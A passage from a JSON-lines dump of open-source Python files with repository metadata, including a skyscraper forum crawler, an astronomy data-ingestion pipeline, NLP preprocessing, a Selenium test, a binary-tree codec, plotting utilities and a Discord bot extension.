Crawler.is_thread(url)\n\n # Starting with a list of pages, do a breadth\n # first search to the given depth, indexing pages\n # as we go\n def crawl(self, pages, depth=1):\n spinner = Spinner('Searching ')\n for i in range(depth):\n newpages = []\n for page in pages:\n try:\n headers = {'User-Agent': 'Mozilla/5.0'}\n req = Request(page, None, headers)\n c = urlopen(req)\n except URLError as e:\n print(e)\n print(\"Could not open %s\" % page)\n continue\n soup = BeautifulSoup(c.read(), \"html.parser\")\n\n links = soup('a')\n for link in links:\n if 'href' in dict(link.attrs):\n url = urljoin(page, link['href'])\n url = url.split('#')[0] # remove location portion\n values = self.split_words(link.getText())\n if len(values) > 3 and self.is_useful(url) and not self.is_indexed(values):\n self.add_to_index(url, values)\n # We only parse forum menu pages since they contain thread titles\n if self.is_menu(url) and url not in pages:\n newpages.append(url)\n spinner.next()\n # Update pages to crawl\n pages = newpages\n\n def display_and_save_stats(self):\n print(f'Found {self._new_buildings} new buildings for a grand total of {len(self._buildings)}.')\n utils.insert_synchronization(self._new_buildings)\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Crawler to get latest skyscrapers developpment.')\n\n parser.add_argument('--init-db', dest='init_db', action='store_true',\n help=\"Init database, drop if already exist\")\n parser.set_defaults(init_db=False)\n parser.add_argument(\"-d\", \"--depth\", type=int, default=1,\n help=\"The depth used to crawl the site\")\n\n args = parser.parse_args()\n\n crawler = Crawler(args.init_db)\n\n forums = ['https://www.skyscrapercity.com/forums/skyscrapers.1720/',\n 'https://www.skyscrapercity.com/forums/proposed-skyscrapers.1728/',\n 'https://www.skyscrapercity.com/forums/megatalls.4070/',\n 'https://www.skyscrapercity.com/forums/supertalls.902/',\n 'https://www.skyscrapercity.com/forums/proposed-supertalls.1718/',\n ]\n\n crawler.crawl(forums, depth=args.depth)\n crawler.display_and_save_stats()\n\n crawler.update_city_coordonates()\n","repo_name":"waxisien/skycrawler","sub_path":"scripts/searchengine.py","file_name":"searchengine.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"33155813425","text":"import argparse\nimport pathlib\nimport subprocess\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # parser.add_argument('--keepall', action='store_true', help='keep all fields from the matchfiles?')\n # parser.add_argument('--test', action='store_true', help='test')\n parser.add_argument(\n \"--np\", type=int, default=96, help=\"number of processes for parallel ingestion\"\n )\n parser.add_argument(\"--bs\", type=int, default=2048, help=\"batch size for ingestion\")\n parser.add_argument(\n \"--tag\", type=str, default=\"20201201\", help=\"mf release time tag\"\n )\n parser.add_argument(\n \"--path\",\n type=str,\n default=str(pathlib.Path.home() / \"tmp\"),\n help=\"local tmp path\",\n )\n\n args = parser.parse_args()\n\n path_tmp = pathlib.Path(args.path)\n if not path_tmp.exists():\n path_tmp.mkdir(parents=True, exist_ok=True)\n\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"-it\",\n \"kowalski_ingester_1\", # \"/bin/bash\", \"-c\",\n \"mkdir\",\n \"-p\",\n f\"/_tmp/ztf_matchfiles_{args.tag}/\",\n ]\n )\n\n rc_start, rc_stop = 0, 63\n\n # cli argument - rc#: [0, 63] ? no, just iterate over range(0, 64) for the stuff below:\n for rc in range(rc_start, rc_stop + 1):\n # fetch matchfiles from gs://ztf-matchfiles-t_tag/rc/ to /_tmp/ztf-matchfiles-t_tag/\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"-it\",\n \"kowalski_ingester_1\",\n \"/usr/local/bin/gsutil\",\n \"-m\",\n \"cp\",\n f\"gs://ztf-matchfiles-{args.tag}/{rc}/*.pytable\",\n # f\"gs://ztf-matchfiles-{args.tag}/{rc}/ztf_000245_zg_c01_q1_match.pytable\", # test\n f\"/_tmp/ztf_matchfiles_{args.tag}/\",\n ]\n )\n # run ingest_ztf_matchfiles.py\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"-it\",\n \"kowalski_ingester_1\",\n \"python\",\n \"/app/ingest_ztf_matchfiles.py\",\n \"--rm\",\n \"--tag\",\n args.tag,\n \"--np\",\n str(args.np),\n \"--bs\",\n str(args.bs),\n ]\n )\n # dump to /_tmp/\n with open(path_tmp / f\"ZTF_sources_{args.tag}.rc{rc:02d}.dump\", \"w\") as f:\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"kowalski_mongo_1\",\n \"mongodump\",\n \"-u=mongoadmin\",\n \"-p=mongoadminsecret\",\n \"--authenticationDatabase=admin\",\n \"--archive\",\n \"--db=kowalski\",\n f\"--collection=ZTF_sources_{args.tag}\",\n ],\n stdout=f,\n )\n # lbzip2 the dump\n subprocess.run(\n [\n \"lbzip2\",\n \"-v\",\n \"-f\",\n \"-n\",\n str(args.np),\n str(path_tmp / f\"ZTF_sources_{args.tag}.rc{rc:02d}.dump\"),\n ]\n )\n # mv to GCS\n subprocess.run(\n [\n # \"docker\", \"exec\", \"-it\", \"kowalski_ingester_1\",\n # \"/usr/local/bin/gsutil\",\n \"gsutil\",\n \"-m\",\n \"mv\",\n # f\"/_tmp/ZTF_sources_{args.tag}.rc{rc:02d}.dump.bz2\",\n str(path_tmp / f\"ZTF_sources_{args.tag}.rc{rc:02d}.dump.bz2\"),\n f\"gs://ztf-sources-{args.tag}/\",\n ]\n )\n # drop the sources collection, keep the exposures collection\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"kowalski_mongo_1\",\n \"mongo\",\n \"-u\",\n \"mongoadmin\",\n \"-p\",\n \"mongoadminsecret\",\n \"--authenticationDatabase\",\n \"admin\",\n \"kowalski\",\n \"--eval\",\n f\"db.ZTF_sources_{args.tag}.drop()\",\n ]\n )\n\n # export exposures\n # dump to /_tmp/\n with open(\n path_tmp / f\"ZTF_exposures_{args.tag}.rc{rc_start:02d}_{rc_stop:02d}.dump\", \"w\"\n ) as f:\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"kowalski_mongo_1\",\n \"mongodump\",\n \"-u=mongoadmin\",\n \"-p=mongoadminsecret\",\n \"--authenticationDatabase=admin\",\n \"--archive\",\n \"--db=kowalski\",\n f\"--collection=ZTF_exposures_{args.tag}\",\n ],\n stdout=f,\n )\n # lbzip2 the dump\n subprocess.run(\n [\n \"lbzip2\",\n \"-v\",\n \"-f\",\n \"-n\",\n str(args.np),\n str(\n path_tmp\n / f\"ZTF_exposures_{args.tag}.rc{rc_start:02d}_{rc_stop:02d}.dump\"\n ),\n ]\n )\n # mv to gs://ztf-sources-20200401\n subprocess.run(\n [\n # \"docker\", \"exec\", \"-it\", \"kowalski_ingester_1\",\n # \"/usr/local/bin/gsutil\",\n \"gsutil\",\n \"-m\",\n \"mv\",\n # f\"/_tmp/ZTF_exposures_{args.tag}.rc{rc_start:02d}_{rc_stop:02d}.dump.bz2\",\n str(\n path_tmp\n / f\"ZTF_exposures_{args.tag}.rc{rc_start:02d}_{rc_stop:02d}.dump.bz2\"\n ),\n f\"gs://ztf-sources-{args.tag}/\",\n ]\n )\n # drop the exposures collection\n subprocess.run(\n [\n \"docker\",\n \"exec\",\n \"kowalski_mongo_1\",\n \"mongo\",\n \"-u\",\n \"mongoadmin\",\n \"-p\",\n \"mongoadminsecret\",\n \"--authenticationDatabase\",\n \"admin\",\n \"kowalski\",\n \"--eval\",\n f\"db.ZTF_exposures_{args.tag}.drop()\",\n ]\n )\n","repo_name":"skyportal/kowalski","sub_path":"kowalski/tools/ztf_mf2dump.py","file_name":"ztf_mf2dump.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"27"} +{"seq_id":"42462992840","text":"import Dataset \nimport nltk,re,string,unicodedata\nfrom nltk import pos_tag\nfrom nltk.corpus import wordnet,stopwords\nfrom nltk.stem.porter import PorterStemmer\nimport re\n\nps = PorterStemmer()\n\n# Dataset final contains is a superset of true and false news \n# Remove columns not required \n\n#vview columns again \ndataset_final.columns\n\n# as we are planning to run NLP so we do not need date , and subject \ndataset_final = dataset_final.drop([\"subject\",\"date\"],axis=1)\n\n#combine the title and text as they both represents same information \n# feature engineering - created extra column using additional columns \n\ndataset_final[\"full_text\"] = dataset_final[\"title\"] + str(\" \") + dataset_final[\"text\"]\n#remove the columns that are not required now \ndataset_final = dataset_final.drop([\"title\",\"text\"],axis=1)\n\n#count of missing data in the dataframe \ncount_of_missing = dataset_final['full_text'].isna().sum()\n\nif count_of_missing > 0 : \n dataset_final=dataset_final.dropna()\n\n#Removing stopwords: \n# There are a lot of words that add no value to any text no matter the data. \n# For example, “I”, “a”, “am”, etc. \n# These words have no informational value and hence can be removed to reduce the size of our corpus \n\n#Exracting Stop Words and Punctuations that needed to be removed from the full_text column \nnltk.download('stopwords')\nstop = set(stopwords.words('english'))\npunctuation = list(string.punctuation)\nstop.update(punctuation)\n \n#Stemming the words: \n# Stemming and Lemmatization are the techniques to reduce the words to their stems or roots. \n# The main advantage of this step is to reduce the size of the vocabulary. \n# For example, words like Play, Playing, Played will be reduced to “Play”. \n# More Examples :\n# Stay, Stays, Staying, Stayed — -> Stay\n# House, Houses, Housing — -> House\n\ndef cleaning_data(text) :\n \"\"\" Apply all cleaning functions here \"\"\"\n #convert text into lower case \n text = text.lower()\n #regex to remove any numbers or special characters from the text \n text = re.sub('[^a-zA-Z]','',text)\n\n #split the data and make token \n token = text.split() \n \n #Lemmatize the words and remove stop words as explained above \n text = [ps.stem(word) for word in token if not word in stop] \n cleaned_news = ' '.join(text)\n \n return cleaned_news\n\n \ndataset_final['full_text_final']=dataset_final['full_text'].apply(cleaning_data)\n\n\n\n","repo_name":"VIKASMAGGO/fakenews","sub_path":"002 Data_PrepProcess.py","file_name":"002 Data_PrepProcess.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4999908910","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\nfrom urllib.parse import unquote\n\nimport pytest\n\nfrom pages.firefox.accounts import FirefoxAccountsPage\n\n\n@pytest.mark.nondestructive\ndef test_account_form(base_url, selenium):\n page = FirefoxAccountsPage(selenium, base_url, params=\"?signed-in=false\").open()\n page.join_firefox_form.type_email(\"success@example.com\")\n page.join_firefox_form.click_continue()\n url = unquote(selenium.current_url)\n assert \"email=success@example.com\" in url, \"Email address is not in URL\"\n\n\n@pytest.mark.nondestructive\n@pytest.mark.skip_if_not_firefox(reason=\"Signed-in state is shown only to Firefox users.\")\ndef test_signed_in_call_to_action(base_url, selenium):\n page = FirefoxAccountsPage(selenium, base_url, params=\"?signed-in=true\").open()\n assert not page.join_firefox_form.is_displayed\n assert page.is_manage_button_displayed\n","repo_name":"mozilla/bedrock","sub_path":"tests/functional/firefox/test_accounts.py","file_name":"test_accounts.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1125,"dataset":"github-code","pt":"27"} +{"seq_id":"11792659255","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom distinct_colours import get_distinct\n\n\n# Plotting parameters\ncols = get_distinct(1)\nlinewidth = 2\nalpha = 0.5\nfontsize = 15\n\n\nclass Measurements(object):\n def __init__(self, var, shot):\n skip_header = 6\n\n if var in set(('ti1', 'ti', 'trot', 'imp')):\n usecols = (0, 1, 3, 6)\n\n if var == 'ti1':\n var = var[:-1]\n\n if var == 'trot':\n skip_footer = 3\n else:\n skip_footer = 0\n\n elif var == 'ne':\n usecols = (0, 1, 3, 5)\n skip_footer = 0\n elif var == 'te':\n usecols = (0, 1, 3, 5)\n skip_header = 5\n skip_footer = 0\n\n self.var = var\n\n # Parse input to locate corresponding file\n if shot == 171536:\n dirtime = 2750\n gaproftime = 2753\n elif shot == 171538:\n dirtime = 2200\n gaproftime = 2202\n else:\n raise ValueError('Unrecognized shot!')\n\n dname = '%i/%ibis/uncertainties/gaprofiles' % (shot, dirtime)\n fname = '%s/d%s.rho%i.0%i' % (dname, self.var, shot, gaproftime)\n\n if var == 'imp':\n fname += '_Carbon'\n\n # Load data\n d = np.genfromtxt(\n fname,\n skip_header=skip_header,\n skip_footer=skip_footer,\n usecols=usecols)\n\n # Parse data\n self.rho = d[:, 0] # radial coordinate\n self.y = d[:, 1] # profile\n self.yerr = d[:, 2] # uncertainty in profile\n self.valid = d[:, 3] # point used in fit?\n\n # Determine viewing geometry\n if self.var in set(('ti', 'trot', 'imp')):\n self.view = np.genfromtxt(\n fname,\n dtype='string',\n skip_header=skip_header,\n skip_footer=skip_footer,\n usecols=(7))\n elif var == 'ne':\n self.view = np.genfromtxt(\n fname,\n dtype='string',\n skip_header=skip_header,\n skip_footer=skip_footer,\n usecols=(6))\n else:\n # For some reason, viewing geometry *not* in te file... WTF.\n # So get data from ne file\n fname = '%s/d%s.rho%i.0%i' % (dname, 'ne', shot, gaproftime)\n self.view = np.genfromtxt(\n fname,\n dtype='string',\n skip_header=6, # different than the te value... again, WTF\n usecols=(6))\n\n def plot(self, rho_lim=[0, 1], drho=0.,\n valid=True, exclude_view=None,\n ax=None, color=cols[0], marker='o', markersize=5):\n if ax is None:\n fig, ax = plt.subplots(1, 1)\n\n if valid and (exclude_view is not None):\n vind = np.where(np.logical_and(\n self.valid == 1,\n self.view != exclude_view))[0]\n elif valid:\n vind = np.where(self.valid == 1)[0]\n elif (exclude_view is not None):\n vind = np.where(self.view != exclude_view)[0]\n else:\n vind = slice(None, None)\n\n rhoind = np.where(np.logical_and(\n self.rho[vind] >= rho_lim[0],\n self.rho[vind] <= rho_lim[1]))[0]\n\n ax.errorbar(\n self.rho[vind][rhoind] + drho,\n self.y[vind][rhoind],\n yerr=self.yerr[vind][rhoind],\n color=color,\n fmt=marker,\n markersize=markersize)\n\n plt.show()\n\n return ax\n\n\nclass Uncertainty(object):\n def __init__(self, var, shot, rho=None, skiprows=5):\n if var == 'ni1' or var == 'ti1':\n var = var[:-1]\n\n self.var = var\n\n # Parse input to locate corresponding file\n if shot == 171536:\n dirtime = 2750\n gaproftime = 2753\n elif shot == 171538:\n dirtime = 2200\n gaproftime = 2202\n else:\n raise ValueError('Unrecognized shot!')\n\n dname = '%i/%ibis/uncertainties/gaprofiles' % (shot, dirtime)\n fname = '%s/d%s.xy.%i.0%i' % (dname, self.var, shot, gaproftime)\n\n if var == 'imp':\n fname += '_Carbon'\n\n # Load data\n d = np.loadtxt(fname, skiprows=skiprows)\n\n # Parse data\n self.rho = d[:, 0] # radial coordinate\n self.y = d[:, 1] # profile\n self.yerr = d[:, 2] # uncertainty in profile\n self.yperr = d[:, 3] # uncertainty in first derivative\n\n # Determine relative error in y\n self.y_relerr = self.yerr / self.y\n\n # Determine a / Ly\n yp = np.gradient(self.y) / np.gradient(self.rho)\n self.aLy = -yp / self.y\n\n # Determine relative error in a / Ly\n term1 = (self.yerr / self.y) ** 2\n term2 = (self.yperr / yp) ** 2\n self.aLy_relerr = np.sqrt(term1 + term2)\n\n # If requested, interpolate data onto new radial grid\n if rho is not None:\n self.y = np.interp(rho, self.rho, self.y)\n self.yerr = np.interp(rho, self.rho, self.yerr)\n self.yperr = np.interp(rho, self.rho, self.yperr)\n self.y_relerr = np.interp(rho, self.rho, self.y_relerr)\n self.aLy = np.interp(rho, self.rho, self.aLy)\n self.aLy_relerr = np.interp(rho, self.rho, self.aLy_relerr)\n self.rho = rho\n\n def plot(self, rholim=[0, 1]):\n rhoind = np.where(np.logical_and(\n self.rho >= rholim[0],\n self.rho < rholim[1]))[0]\n\n fig, axs = plt.subplots(1, 2, sharex=True)\n\n axs[0].plot(\n self.rho[rhoind],\n self.y_relerr[rhoind],\n color=cols[0],\n linewidth=linewidth)\n\n axs[1].semilogy(\n self.rho[rhoind],\n self.aLy_relerr[rhoind],\n color=cols[0],\n linewidth=linewidth)\n\n axs[0].set_xlabel(\n r'$\\mathregular{\\rho}$',\n fontsize=fontsize)\n axs[0].set_ylabel(\n r'$\\mathregular{\\sigma_{%s} / %s}$' % (self.var, self.var),\n fontsize=fontsize)\n\n axs[1].set_xlabel(\n r'$\\mathregular{\\rho}$',\n fontsize=fontsize)\n axs[1].set_ylabel(\n r'$\\mathregular{\\sigma_{L_{%s}} / L_{%s}}$' % (self.var, self.var),\n fontsize=fontsize)\n\n plt.tight_layout()\n plt.show()\n\n return\n\n\nif __name__ == '__main__':\n shot = 171536\n drho = 0.005\n rho = np.arange(0, 1 + drho, drho)\n\n for profile in ['ne', 'te', 'ti', 'trot']:\n u = Uncertainty(profile, shot, rho=rho)\n u.plot()\n","repo_name":"emd/thesis","sub_path":"Chapters/TurbulenceMeasurements/figs/get_uncertainty.py","file_name":"get_uncertainty.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34542336265","text":"from blogforum.db import get_db\nimport mysql.connector as sql\nimport csv\n\nconfig = {\n 'user': 'root',\n 'password': 'p',\n 'host': '127.0.0.1',\n 'database': 'blogdb',\n 'raise_on_warnings': True,\n}\n\n#saves user report csv to server to be downloaded\ndef generate_userreport():\n\n cnx = sql.connect(**config)\n cursor = cnx.cursor()\n\n query = (\"SELECT userId,username,firstName,lastName,dateCreated FROM Users\")\n\n cursor.execute(query)\n\n all_users = cursor.fetchall()\n\n out = [[\"User ID\",\"Username\",\"First Name\",\"Last Name\",\"Account Created\"]]\n\n for u in all_users:\n iout = []\n for i in range(len(u)):\n iout.append(u[i])\n out.append(iout)\n\n # write to existing file in reports folder\n with open(\"blogforum/reports/user_report.csv\", 'w+') as f:\n writer = csv.writer(f)\n writer.writerows(out)\n\n#saves report to csv file to server to be downloaded\ndef generate_blogreport():\n\n cnx = sql.connect(**config)\n cursor = cnx.cursor()\n\n query = (\"SELECT postid,u.username,postdate,subject,body FROM posts p JOIN Users u ON p.creatorid=u.userID\")\n\n cursor.execute(query)\n\n all_posts = cursor.fetchall()\n\n out = [[\"Post ID\",\"Username\",\"Post Date\",\"Title\",\"Body\"] ]\n\n for p in all_posts:\n iout = []\n for i in range(len(p)):\n iout.append(p[i])\n out.append(iout)\n\n # write to existing file in reports folder\n with open(\"blogforum/reports/blog_report.csv\", 'w+') as f:\n writer = csv.writer(f)\n writer.writerows(out)\n\n\ndef generate_all_reports():\n generate_userreport()\n generate_blogreport()\n","repo_name":"Namsinh/408-finalproject","sub_path":"408-FinalProject/blogforum/generate_reports.py","file_name":"generate_reports.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70901063432","text":"class Jedi:\n def __init__(self, **kwargs) -> None:\n self.__name = kwargs.get('name', None)\n self.__height = kwargs.get('height', 0)\n self.__title = kwargs.get('title', None)\n self.__side = kwargs.get('side', None)\n self.__light_saber = kwargs.get('light_saber', None)\n\n def __str__(self) -> str:\n return \"\\nName: {}\\nHeight: {}\\nTitle: {}\\nSide: {}\\nlight_saber: {}\\n\".format(\n self.__name, self.__height, self.__title, self.__side, self.__light_saber\n )\n\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, value):\n self.__name = value\n\n @property\n def height(self):\n return self.__height\n\n @height.setter\n def height(self, height):\n if height in range(135, 203):\n self.__height = height\n else:\n raise ValueError('Incorrect growth')\n\n @property\n def title(self):\n return self.__title\n\n @title.setter\n def title(self, value):\n self.__title = value\n\n @property\n def side(self):\n return self.__side\n\n @side.setter\n def side(self, value):\n self.__side = value\n\n @property\n def light_saber(self):\n return self.__light_saber\n\n @light_saber.setter\n def light_saber(self, value):\n self.__light_saber = value\n\n\nif __name__ == \"__main__\":\n anakin_skywalker = Jedi(\n name='Anakin Skywalker',\n height=188,\n title='Jedi Knight',\n side='The bright side',\n light_saber='Blue',\n )\n anakin_skywalker.name = 'Darth Vader'\n anakin_skywalker.height = 202\n anakin_skywalker.title = 'The dark lord of the sith'\n anakin_skywalker.side = 'The dark side'\n anakin_skywalker.light_saber = 'Red'\n print(anakin_skywalker)\n\n anakin_skywalker.name = 'Young Anakin Skywalker'\n anakin_skywalker.height = 135\n anakin_skywalker.title = 'The Racer from Tatooine'\n anakin_skywalker.side = 'The bright side'\n anakin_skywalker.light_saber = None\n print(anakin_skywalker)\n","repo_name":"dust2907/HW_SkillUp","sub_path":"Lesson 3-8/HW 3-8.py","file_name":"HW 3-8.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4461774498","text":"from random import choice\r\nimport string\r\n\r\n\r\nclass Infinite_Monkey:\r\n def __init__(self, frase):\r\n self.frase = frase\r\n self._frase_length = len(frase)\r\n self._count = 0\r\n self._result = self.monkey_guess(self.frase)\r\n\r\n @property\r\n def result(self):\r\n return self._result\r\n\r\n def monkey_prints(self, frase_length):\r\n letters = string.ascii_lowercase + ' '\r\n monkey_guess = ''\r\n for _ in range(frase_length):\r\n monkey_guess += choice(letters)\r\n return monkey_guess\r\n\r\n def monkey_compares(self, guess):\r\n letter_count = 0\r\n letters_matched = 0\r\n for _ in range(self._frase_length):\r\n if self.frase[letter_count] == guess[letter_count]:\r\n letters_matched += 1\r\n letter_count += 1\r\n return letters_matched\r\n\r\n def monkey_guess(self, frase):\r\n best_match = [0, '']\r\n found = False\r\n while not found:\r\n self._count += 1\r\n attempt = self.monkey_prints(self._frase_length)\r\n if attempt == frase:\r\n print('Match found!')\r\n found = True\r\n letters_matched_in_attempt = self.monkey_compares(attempt)\r\n if letters_matched_in_attempt >= best_match[0]:\r\n best_match = [letters_matched_in_attempt, attempt]\r\n if self._count % 1000 == 0:\r\n print(f'On count {str(self._count)} best match is \"{best_match[1]}\".')\r\n return f'It took {str(self._count)} attempts to generate \"{self.frase}\".'\r\n\r\n\r\nif __name__ == \"__main__\":\r\n first_try = Infinite_Monkey('meth')\r\n second_try = Infinite_Monkey('meth')\r\n third_try = Infinite_Monkey('meth')\r\n print(f'\\nFirst try:\\n{first_try.result}')\r\n print(f'\\nSecond try:\\n{second_try.result}')\r\n print(f'\\nThird try:\\n{third_try.result}\\n')","repo_name":"fortredux/py_miscellaneous","sub_path":"miller_ranum/infinite_monkeys.py","file_name":"infinite_monkeys.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72822566471","text":"\"\"\"Baseclass for system evaluations.\"\"\"\nfrom abc import ABC, abstractmethod, abstractproperty\nimport logging\nfrom typing import List\n\nfrom ...const import CoreState\nfrom ...coresys import CoreSys, CoreSysAttributes\nfrom ..const import UnsupportedReason\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\n\nclass EvaluateBase(ABC, CoreSysAttributes):\n \"\"\"Baseclass for evaluation.\"\"\"\n\n def __init__(self, coresys: CoreSys) -> None:\n \"\"\"Initialize the evaluation class.\"\"\"\n self.coresys = coresys\n\n async def __call__(self) -> None:\n \"\"\"Execute the evaluation.\"\"\"\n if self.sys_core.state not in self.states:\n return\n if await self.evaluate():\n if self.reason not in self.sys_resolution.unsupported:\n self.sys_resolution.unsupported = self.reason\n _LOGGER.warning(\n \"%s (more-info: https://www.openpeerpower.io/more-info/unsupported/%s)\",\n self.on_failure,\n self.reason.value,\n )\n else:\n if self.reason in self.sys_resolution.unsupported:\n _LOGGER.info(\"Clearing %s as reason for unsupported\", self.reason)\n self.sys_resolution.dismiss_unsupported(self.reason)\n\n @abstractmethod\n async def evaluate(self):\n \"\"\"Run evaluation.\"\"\"\n\n @property\n @abstractproperty\n def reason(self) -> UnsupportedReason:\n \"\"\"Return a UnsupportedReason enum.\"\"\"\n\n @property\n @abstractproperty\n def on_failure(self) -> str:\n \"\"\"Return a string that is printed when self.evaluate is False.\"\"\"\n\n @property\n def states(self) -> List[CoreState]:\n \"\"\"Return a list of valid states when this evaluation can run.\"\"\"\n return []\n","repo_name":"OpenPeerPower/supervisor","sub_path":"supervisor/resolution/evaluations/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1509144330","text":"import functools\n\nfrom flask import render_template\n\n\nWHITE = \"#ffffff\"\nGREY_1 = \"#fafafa\"\nGREY_2 = \"#f5f5f5\"\nGREY_3 = \"#dddddd\"\nGREY_4 = \"#aaaaaa\"\nBLACK = \"#000000\"\nRED_1 = \"#ff4d88\"\nRED_2 = \"#e60047\"\nRED_3 = \"#990033\"\nALERT_GREEN = \"#82ff82\"\nALERT_YELLOW = \"#eeff88\"\nALERT_RED = \"#ff4d88\"\nGREEN = \"#476b6b\"\nBLUE = \"#22408f\"\n\n\ndef get_color_styles():\n \"\"\"\n :rtype: str\n :return: css styles consisting of color variables\n \"\"\"\n str_ = \":root {\\n\"\n str_ += \" --white: {};\\n\".format(WHITE)\n str_ += \" --grey-1: {};\\n\".format(GREY_1)\n str_ += \" --grey-2: {};\\n\".format(GREY_2)\n str_ += \" --grey-3: {};\\n\".format(GREY_3)\n str_ += \" --grey-4: {};\\n\".format(GREY_4)\n str_ += \" --black: {};\\n\".format(BLACK)\n str_ += \" --red-1: {};\\n\".format(RED_1)\n str_ += \" --red-2: {};\\n\".format(RED_2)\n str_ += \" --red-3: {};\\n\".format(RED_3)\n str_ += \" --alert-green: {};\\n\".format(ALERT_GREEN)\n str_ += \" --alert-yellow: {};\\n\".format(ALERT_YELLOW)\n str_ += \" --alert-red: {};\\n\".format(ALERT_RED)\n str_ += \" --green: {};\\n\".format(GREEN)\n str_ += \" --blue: {};\\n\".format(BLUE)\n str_ += \"}\\n\"\n return str_\n\n\ndef render_colors(func_):\n \"\"\"\n :type func\\_: func\n :param func\\_: :func:`~flask.render_template`\n :rtype: func\n :return: decorated function\n \"\"\"\n @functools.wraps(func_)\n def wrapper(*args, **kwargs):\n return func_(*args, color_styles=get_color_styles(), **kwargs)\n return wrapper\n\n\ncolored_template = render_colors(render_template)\n","repo_name":"hjanka/polyfemos","sub_path":"polyfemos_source/front/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39509717343","text":"#\n# @lc app=leetcode id=449 lang=python3\n#\n# [449] Serialize and Deserialize BST\n#\nfrom collections import deque\n\n\n# @lc code=start\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Codec:\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n if not root:\n return ''\n\n data = []\n q = deque()\n q.append(root)\n while q:\n node = q.popleft()\n data.append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n\n return '|'.join([str(d) for d in data])\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n if not data:\n return None\n\n data = data.split('|')\n root = TreeNode(int(data[0]))\n for i in range(1, len(data)):\n val = int(data[i])\n self._insert_to_bst(root, val)\n\n return root\n\n def _insert_to_bst(self, root, val):\n if not root:\n return\n\n node = root\n while node:\n if val > node.val:\n if node.right:\n node = node.right\n else:\n node.right = TreeNode(val)\n return\n else:\n if node.left:\n node = node.left\n else:\n node.left = TreeNode(val)\n return\n\n\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# root = TreeNode(9)\n# root.left = TreeNode(6)\n# root.right = TreeNode(11)\n# root.left.left = TreeNode(2)\n# root.right.right = TreeNode(12)\n# root.left.right = TreeNode(7)\n# tree = ser.serialize(root)\n# ans = deser.deserialize(tree)\n# print(ans)\n# @lc code=end\n","repo_name":"domosnake/leetcode_solution","sub_path":"449.serialize-and-deserialize-bst.py","file_name":"449.serialize-and-deserialize-bst.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8464365294","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nfrom typing import (\n AnyStr, List\n)\n\nfrom .BaseLineProcessor import BaseLineProcessor\n\n\nclass TargetContextBasedLineProcessor(BaseLineProcessor):\n def line_process(self, record_str):\n # type: (str) -> List\n record_list = record_str.split(sep=',')\n if len(record_list) != 2:\n raise ValueError(\"Length of record_list: {} is not 2\".format(record_list))\n current_word, context_word = map(lambda x: int(x), record_list)\n return [(current_word, context_word)]\n","repo_name":"howl-anderson/entity2embedding","sub_path":"entity2embedding/corpora/builder/TargetContextBasedLineProcessor.py","file_name":"TargetContextBasedLineProcessor.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"33909298562","text":"from . import extension\nfrom .. import utils, constants\nfrom hata.discord import client_core\nfrom hata import backend, discord\nfrom time import time\n\nclass Fun(extension.Extension):\n def __init__(self, client):\n self.client = client\n self.chat_grabbers = []\n\n async def send_start_message(self, chat_grabber: utils.ChatGrabber):\n embed = discord.Embed(color=constants.Colors.BLUE, description='Say hi, you\\'re talking to people in **{}**'.format(chat_grabber.destination.guild))\n await self.client.message_create(chat_grabber.origin, embed=embed)\n embed = discord.Embed(color=constants.Colors.BLUE, description='Say hi, you\\'re talking to people in **{}**'.format(chat_grabber.origin.guild))\n await self.client.message_create(chat_grabber.destination, embed=embed)\n\n async def send_stop_message(self, chat_grabber: utils.ChatGrabber):\n embed = 